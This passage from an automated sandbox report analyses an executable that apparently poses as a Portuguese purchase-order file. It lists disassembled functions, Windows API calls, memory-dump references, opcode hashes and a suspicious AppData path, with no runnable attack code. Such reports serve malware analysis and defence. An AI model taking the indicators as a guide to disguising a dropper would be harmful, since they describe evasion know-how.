                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 2cd36f0d48dcadf8a0967ef3185ed5b2b885b7484726fb5ce8841cd1b5828a50
                                                                                              • Instruction ID: 10f0f1b1c79289e67bc844ccbe5aec3c597dbf8b190d8890215e27c6ac549869
                                                                                              • Opcode Fuzzy Hash: 2cd36f0d48dcadf8a0967ef3185ed5b2b885b7484726fb5ce8841cd1b5828a50
                                                                                              • Instruction Fuzzy Hash: 27B0123A180A00BBDE118B00EE0AF857E62F7AC701F018438B340250F0CAF300E0DB08
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403258 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00403536,?), ref: 00403266
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 973152223-0
                                                                                              • Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                                                              • Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
                                                                                              • Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                                                              • Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404136 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00403F0E), ref: 00404140
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallbackDispatcherUser
                                                                                              • String ID:
                                                                                              • API String ID: 2492992576-0
                                                                                              • Opcode ID: 09484a4c0bb45b5d2a25c6d29655a2ab56222c5132b062e897c9f059ee403ea7
                                                                                              • Instruction ID: 67e4992f565e21c11dbb8c54ac12ec2a13ba7de1e04ee321f93102ddb6e8c06b
                                                                                              • Opcode Fuzzy Hash: 09484a4c0bb45b5d2a25c6d29655a2ab56222c5132b062e897c9f059ee403ea7
                                                                                              • Instruction Fuzzy Hash: B2A00176944501EBCE129B90EF49D0ABB62EBE4701B5185B9A685900348A728862EB69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: f5155c82eacd931717c49448e5e104d46a4312587cf016571ad76e57a440d271
                                                                                              • Instruction ID: d12e9c11b6b9b854787454326f23abfe3faf9d6a634dc5341367369e5c825980
                                                                                              • Opcode Fuzzy Hash: f5155c82eacd931717c49448e5e104d46a4312587cf016571ad76e57a440d271
                                                                                              • Instruction Fuzzy Hash: B0D01277B141009BE750EFB9BF89CAF73A8EB913293254837D902E10E2D57CD801862C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Function 00404B2B Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404B43
                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404B4E
                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B98
                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404BAB
                                                                                              • SetWindowLongW.USER32(?,000000FC,00405123), ref: 00404BC4
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BD8
                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEA
                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404C00
                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C0C
                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C1E
                                                                                              • DeleteObject.GDI32(00000000), ref: 00404C21
                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C4C
                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C58
                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CEE
                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D19
                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D2D
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404D5C
                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6A
                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404D7B
                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E78
                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EDD
                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF2
                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F16
                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F36
                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404F4B
                                                                                              • GlobalFree.KERNEL32(?), ref: 00404F5B
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD4
                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040507D
                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040508C
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004050AC
                                                                                              • ShowWindow.USER32(?,00000000), ref: 004050FA
                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00405105
                                                                                              • ShowWindow.USER32(00000000), ref: 0040510C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                              • String ID: $M$N
                                                                                              • API String ID: 1638840714-813528018
                                                                                              • Opcode ID: 573b9ff58b83ee1454a1a693654ce7e624338e230ee879d58558bf43250699fe
                                                                                              • Instruction ID: 92be4e2f0a71e0becefd48613cebd317121b53e3330ca333a75e7b8088edbb55
                                                                                              • Opcode Fuzzy Hash: 573b9ff58b83ee1454a1a693654ce7e624338e230ee879d58558bf43250699fe
                                                                                              • Instruction Fuzzy Hash: 49027FB0900209EFDB209F95DD85AAE7BB5FB84314F10817AF610BA2E1C7799D42CF58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004045AF Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 004045FE
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00404628
                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 004046D9
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 004046E4
                                                                                              • lstrcmpiW.KERNEL32(: Completed,0042D248,00000000,?,?), ref: 00404716
                                                                                              • lstrcatW.KERNEL32(?,: Completed), ref: 00404722
                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404734
                                                                                                • Part of subcall function 00405779: GetDlgItemTextW.USER32(?,?,00000400,0040476B), ref: 0040578C
                                                                                                • Part of subcall function 004062E4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00406347
                                                                                                • Part of subcall function 004062E4: CharNextW.USER32(?,?,?,00000000), ref: 00406356
                                                                                                • Part of subcall function 004062E4: CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040635B
                                                                                                • Part of subcall function 004062E4: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040636E
                                                                                              • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 004047F7
                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404812
                                                                                                • Part of subcall function 0040496B: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A0C
                                                                                                • Part of subcall function 0040496B: wsprintfW.USER32 ref: 00404A15
                                                                                                • Part of subcall function 0040496B: SetDlgItemTextW.USER32(?,0042D248), ref: 00404A28
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                              • String ID: : Completed$A$C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender
                                                                                              • API String ID: 2624150263-1919279478
                                                                                              • Opcode ID: 10e69ddc2ef15b09b644a8b6fb0d76715ac19094bf7e98a88b7b8229abe1abe5
                                                                                              • Instruction ID: d238959ebaf25b01a045b7410cfe39ad7a074a1c0e4d09bd35cd2a97c430e078
                                                                                              • Opcode Fuzzy Hash: 10e69ddc2ef15b09b644a8b6fb0d76715ac19094bf7e98a88b7b8229abe1abe5
                                                                                              • Instruction Fuzzy Hash: 25A171B1900209ABDB11AFA5CD85AAFB7B8EF85314F10843BF601B72D1D77C89418B6D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402095 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten, xrefs: 00402154
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateInstance
                                                                                              • String ID: C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten
                                                                                              • API String ID: 542301482-4006481345
                                                                                              • Opcode ID: bad8c02c9a5232ae2fe7c83ed2c0402b497b8bb1bc98c16d71f743dd1851b813
                                                                                              • Instruction ID: c02b05589a316e099dfb0d7529d526a00835c5092bff723ddb1c3c0439b696db
                                                                                              • Opcode Fuzzy Hash: bad8c02c9a5232ae2fe7c83ed2c0402b497b8bb1bc98c16d71f743dd1851b813
                                                                                              • Instruction Fuzzy Hash: E5412A71A00208AFCF00DFA4CD88AAD7BB6FF48314B24457AF515EB2D1DBB99A41CB54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00407040 Relevance: 2.8, Strings: 2, Instructions: 300COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: p!C$p!C
                                                                                              • API String ID: 0-3125587631
                                                                                              • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                                              • Instruction ID: 15f69c865bc8d9ec0e9cf8060aa07673d574756af28658d99b75493111c5da86
                                                                                              • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                                              • Instruction Fuzzy Hash: 1DC15831E042598BCF18CF68D4905EEB7B2FF99314F25826AD8567B380D7346A42CF95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406869 Relevance: .3, Instructions: 334COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                                              • Instruction ID: c1774f2f946c4964f784778ac851d6f11cf56bcc8977249e4dfbf1b2b48c2d4a
                                                                                              • Opcode Fuzzy Hash: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                                              • Instruction Fuzzy Hash: B2E17A71A0070ADFDB24CF58C880BAAB7F5EF45305F15892EE497A7291D738AA91CF14
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004042B1 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207windowstringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040434F
                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404363
                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404380
                                                                                              • GetSysColor.USER32(?), ref: 00404391
                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040439F
                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043AD
                                                                                              • lstrlenW.KERNEL32(?), ref: 004043B2
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043BF
                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D4
                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040442D
                                                                                              • SendMessageW.USER32(00000000), ref: 00404434
                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0040445F
                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A2
                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004044B0
                                                                                              • SetCursor.USER32(00000000), ref: 004044B3
                                                                                              • ShellExecuteW.SHELL32(0000070B,open,00432E80,00000000,00000000,00000001), ref: 004044C8
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004044D4
                                                                                              • SetCursor.USER32(00000000), ref: 004044D7
                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404506
                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404518
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                              • String ID: (B@$: Completed$N$open
                                                                                              • API String ID: 3615053054-2720870854
                                                                                              • Opcode ID: a63e6e2122d515d214c502fe3e454e68733c502862964fa3bbe4886b2a00d4bb
